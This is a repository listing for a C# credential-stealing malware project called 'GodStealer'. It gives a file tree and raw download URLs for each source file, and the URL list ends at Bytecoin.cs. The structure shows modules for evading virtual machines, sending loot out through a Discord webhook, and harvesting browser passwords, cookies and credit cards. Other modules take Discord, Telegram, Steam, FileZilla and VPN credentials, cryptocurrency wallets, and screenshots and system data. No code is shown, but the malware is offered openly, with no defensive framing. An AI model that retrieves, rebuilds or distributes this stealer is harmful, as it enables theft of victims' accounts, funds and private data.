├── GodStealer.sln ├── GodStealer ├── AntiVM │ └── AntiVM.cs ├── Config.cs ├── GodStealer.csproj ├── GodStealer.csproj.user ├── Helpers │ ├── AES.cs │ ├── Counter.cs │ ├── Filemanager.cs │ ├── GenStrings.cs │ ├── Help.cs │ └── WinAPI.cs ├── ProductKey.cs ├── Program.cs ├── Properties │ └── AssemblyInfo.cs ├── Resources │ ├── Discord │ │ └── DiscordWebhook.cs │ └── DotNetZip │ │ ├── CRC32.cs │ │ ├── Zip │ │ ├── ComHelper.cs │ │ ├── EncryptionAlgorithm.cs │ │ ├── Events.cs │ │ ├── Exceptions.cs │ │ ├── ExtractExistingFileAction.cs │ │ ├── FileSelector.cs │ │ ├── OffsetStream.cs │ │ ├── Shared.cs │ │ ├── WinZipAes.cs │ │ ├── ZipConstants.cs │ │ ├── ZipCrypto.cs │ │ ├── ZipDirEntry.cs │ │ ├── ZipEntry.Extract.cs │ │ ├── ZipEntry.Read.cs │ │ ├── ZipEntry.Write.cs │ │ ├── ZipEntry.cs │ │ ├── ZipEntrySource.cs │ │ ├── ZipErrorAction.cs │ │ ├── ZipFile.AddUpdate.cs │ │ ├── ZipFile.Check.cs │ │ ├── ZipFile.Events.cs │ │ ├── ZipFile.Extract.cs │ │ ├── ZipFile.Read.cs │ │ ├── ZipFile.Save.cs │ │ ├── ZipFile.SaveSelfExtractor.cs │ │ ├── ZipFile.Selector.cs │ │ ├── ZipFile.cs │ │ ├── ZipFile.x-IEnumerable.cs │ │ ├── ZipInputStream.cs │ │ ├── ZipOutputStream.cs │ │ └── ZipSegmentedStream.cs │ │ └── Zlib │ │ ├── Deflate.cs │ │ ├── DeflateStream.cs │ │ ├── GZipStream.cs │ │ ├── InfTree.cs │ │ ├── Inflate.cs │ │ ├── ParallelDeflateOutputStream.cs │ │ ├── Tree.cs │ │ ├── Zlib.cs │ │ ├── ZlibBaseStream.cs │ │ ├── ZlibCodec.cs │ │ ├── ZlibConstants.cs │ │ └── ZlibStream.cs ├── Targets │ ├── Discord │ │ └── Discord.cs │ ├── FileZilla │ │ └── FileZilla.cs │ ├── Minecraft │ │ └── VimeWorld.cs │ ├── Steam │ │ └── Steam.cs │ ├── Telegram │ │ └── Telegram.cs │ ├── VPN │ │ ├── NordVPN.cs │ │ ├── OpenVPN.cs │ │ └── ProtonVPN.cs │ ├── Браузеры │ │ ├── Helpers │ │ │ ├── Banking.cs │ │ │ ├── Common.cs │ │ │ ├── Decryptor.cs │ │ │ ├── Json.cs │ │ │ ├── Paths.cs │ │ │ ├── Profile.cs │ │ │ ├── SQLite.cs │ │ │ ├── SqlReader.cs │ │ │ └── Utils.cs │ │ ├── Stealer.cs │ │ ├── Targets │ │ │ └── Browsers │ │ │ │ ├── BrowserUtils.cs │ │ │ │ ├── Chromium │ │ │ │ ├── AesGcm.cs │ │ │ │ ├── AutoFill.cs │ │ │ │ ├── BCrypt.cs │ │ │ │ ├── Bookmarks.cs │ │ │ │ ├── Chromium.cs │ │ │ │ ├── Cookies.cs │ │ │ │ ├── CreditCards.cs │ │ │ │ ├── Downloads.cs │ │ │ │ ├── History.cs │ │ │ │ └── Passwords.cs │ │ │ │ ├── Edge │ │ │ │ ├── AutoFill.cs │ │ │ │ ├── Bookmarks.cs │ │ │ │ ├── CreditCards.cs │ │ │ │ └── Edge.cs │ │ │ │ └── Firefox │ │ │ │ ├── Bookmarks.cs │ │ │ │ ├── Cookies.cs │ │ │ │ ├── FireFox.cs │ │ │ │ ├── History.cs │ │ │ │ └── Passwords.cs │ │ └── URLSearcher.cs │ ├── Информация │ │ ├── BSSID.cs │ │ ├── Buffer.cs │ │ ├── ProcessList.cs │ │ ├── Screen.cs │ │ └── SystemInfo.cs │ ├── Крипта │ │ ├── @StartWallets.cs │ │ ├── Armory.cs │ │ ├── AtomicWallet.cs │ │ ├── BitcoinCore.cs │ │ ├── Bytecoin.cs │ │ ├── DashCore.cs │ │ ├── Electrum.cs │ │ ├── Ethereum.cs │ │ ├── Exodus.cs │ │ ├── Jaxx.cs │ │ ├── LitecoinCore.cs │ │ ├── Monero.cs │ │ └── Zcash.cs │ └── Файлы │ │ ├── Files.cs │ │ ├── Folders.cs │ │ └── IFolders.cs ├── app.config ├── app.manifest └── packages.config ├── README.md └── packages.zip /GodStealer.sln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer.sln -------------------------------------------------------------------------------- /GodStealer/AntiVM/AntiVM.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/AntiVM/AntiVM.cs -------------------------------------------------------------------------------- /GodStealer/Config.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Config.cs -------------------------------------------------------------------------------- /GodStealer/GodStealer.csproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/GodStealer.csproj -------------------------------------------------------------------------------- /GodStealer/GodStealer.csproj.user: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/GodStealer.csproj.user -------------------------------------------------------------------------------- /GodStealer/Helpers/AES.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Helpers/AES.cs -------------------------------------------------------------------------------- /GodStealer/Helpers/Counter.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Helpers/Counter.cs -------------------------------------------------------------------------------- /GodStealer/Helpers/Filemanager.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Helpers/Filemanager.cs -------------------------------------------------------------------------------- /GodStealer/Helpers/GenStrings.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Helpers/GenStrings.cs -------------------------------------------------------------------------------- /GodStealer/Helpers/Help.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Helpers/Help.cs -------------------------------------------------------------------------------- /GodStealer/Helpers/WinAPI.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Helpers/WinAPI.cs -------------------------------------------------------------------------------- /GodStealer/ProductKey.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/ProductKey.cs -------------------------------------------------------------------------------- /GodStealer/Program.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Program.cs -------------------------------------------------------------------------------- /GodStealer/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Properties/AssemblyInfo.cs -------------------------------------------------------------------------------- /GodStealer/Resources/Discord/DiscordWebhook.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/Discord/DiscordWebhook.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/CRC32.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/CRC32.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ComHelper.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ComHelper.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/EncryptionAlgorithm.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/EncryptionAlgorithm.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/Events.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/Events.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/Exceptions.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/Exceptions.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ExtractExistingFileAction.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ExtractExistingFileAction.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/FileSelector.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/FileSelector.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/OffsetStream.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/OffsetStream.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/Shared.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/Shared.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/WinZipAes.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/WinZipAes.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipConstants.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipConstants.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipCrypto.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipCrypto.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipDirEntry.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipDirEntry.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipEntry.Extract.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipEntry.Extract.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipEntry.Read.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipEntry.Read.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipEntry.Write.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipEntry.Write.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipEntry.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipEntry.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipEntrySource.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipEntrySource.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipErrorAction.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipErrorAction.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipFile.AddUpdate.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipFile.AddUpdate.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipFile.Check.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipFile.Check.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipFile.Events.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipFile.Events.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipFile.Extract.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipFile.Extract.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipFile.Read.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipFile.Read.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipFile.Save.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipFile.Save.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipFile.SaveSelfExtractor.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipFile.SaveSelfExtractor.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipFile.Selector.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipFile.Selector.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipFile.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipFile.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipFile.x-IEnumerable.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipFile.x-IEnumerable.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipInputStream.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipInputStream.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipOutputStream.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipOutputStream.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zip/ZipSegmentedStream.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zip/ZipSegmentedStream.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zlib/Deflate.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zlib/Deflate.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zlib/DeflateStream.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zlib/DeflateStream.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zlib/GZipStream.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zlib/GZipStream.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zlib/InfTree.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zlib/InfTree.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zlib/Inflate.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zlib/Inflate.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zlib/ParallelDeflateOutputStream.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zlib/ParallelDeflateOutputStream.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zlib/Tree.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zlib/Tree.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zlib/Zlib.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zlib/Zlib.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zlib/ZlibBaseStream.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zlib/ZlibBaseStream.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zlib/ZlibCodec.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zlib/ZlibCodec.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zlib/ZlibConstants.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zlib/ZlibConstants.cs -------------------------------------------------------------------------------- /GodStealer/Resources/DotNetZip/Zlib/ZlibStream.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Resources/DotNetZip/Zlib/ZlibStream.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Discord/Discord.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Discord/Discord.cs -------------------------------------------------------------------------------- /GodStealer/Targets/FileZilla/FileZilla.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/FileZilla/FileZilla.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Minecraft/VimeWorld.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Minecraft/VimeWorld.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Steam/Steam.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Steam/Steam.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Telegram/Telegram.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Telegram/Telegram.cs -------------------------------------------------------------------------------- /GodStealer/Targets/VPN/NordVPN.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/VPN/NordVPN.cs -------------------------------------------------------------------------------- /GodStealer/Targets/VPN/OpenVPN.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/VPN/OpenVPN.cs -------------------------------------------------------------------------------- /GodStealer/Targets/VPN/ProtonVPN.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/VPN/ProtonVPN.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Helpers/Banking.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Helpers/Banking.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Helpers/Common.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Helpers/Common.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Helpers/Decryptor.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Helpers/Decryptor.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Helpers/Json.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Helpers/Json.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Helpers/Paths.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Helpers/Paths.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Helpers/Profile.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Helpers/Profile.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Helpers/SQLite.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Helpers/SQLite.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Helpers/SqlReader.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Helpers/SqlReader.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Helpers/Utils.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Helpers/Utils.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Stealer.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Stealer.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Targets/Browsers/BrowserUtils.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Targets/Browsers/BrowserUtils.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Targets/Browsers/Chromium/AesGcm.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Targets/Browsers/Chromium/AesGcm.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Targets/Browsers/Chromium/AutoFill.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Targets/Browsers/Chromium/AutoFill.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Targets/Browsers/Chromium/BCrypt.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Targets/Browsers/Chromium/BCrypt.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Targets/Browsers/Chromium/Bookmarks.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Targets/Browsers/Chromium/Bookmarks.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Targets/Browsers/Chromium/Chromium.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Targets/Browsers/Chromium/Chromium.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Targets/Browsers/Chromium/Cookies.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Targets/Browsers/Chromium/Cookies.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Targets/Browsers/Chromium/CreditCards.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Targets/Browsers/Chromium/CreditCards.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Targets/Browsers/Chromium/Downloads.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Targets/Browsers/Chromium/Downloads.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Targets/Browsers/Chromium/History.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Targets/Browsers/Chromium/History.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Targets/Browsers/Chromium/Passwords.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Targets/Browsers/Chromium/Passwords.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Targets/Browsers/Edge/AutoFill.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Targets/Browsers/Edge/AutoFill.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Targets/Browsers/Edge/Bookmarks.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Targets/Browsers/Edge/Bookmarks.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Targets/Browsers/Edge/CreditCards.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Targets/Browsers/Edge/CreditCards.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Targets/Browsers/Edge/Edge.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Targets/Browsers/Edge/Edge.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Targets/Browsers/Firefox/Bookmarks.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Targets/Browsers/Firefox/Bookmarks.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Targets/Browsers/Firefox/Cookies.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Targets/Browsers/Firefox/Cookies.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Targets/Browsers/Firefox/FireFox.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Targets/Browsers/Firefox/FireFox.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Targets/Browsers/Firefox/History.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Targets/Browsers/Firefox/History.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/Targets/Browsers/Firefox/Passwords.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/Targets/Browsers/Firefox/Passwords.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Браузеры/URLSearcher.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Браузеры/URLSearcher.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Информация/BSSID.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Информация/BSSID.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Информация/Buffer.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Информация/Buffer.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Информация/ProcessList.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Информация/ProcessList.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Информация/Screen.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Информация/Screen.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Информация/SystemInfo.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Информация/SystemInfo.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Крипта/@StartWallets.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Крипта/@StartWallets.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Крипта/Armory.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Крипта/Armory.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Крипта/AtomicWallet.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Крипта/AtomicWallet.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Крипта/BitcoinCore.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Крипта/BitcoinCore.cs -------------------------------------------------------------------------------- /GodStealer/Targets/Крипта/Bytecoin.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1Emin/GodStealer/HEAD/GodStealer/Targets/Крипта/Bytecoin.cs 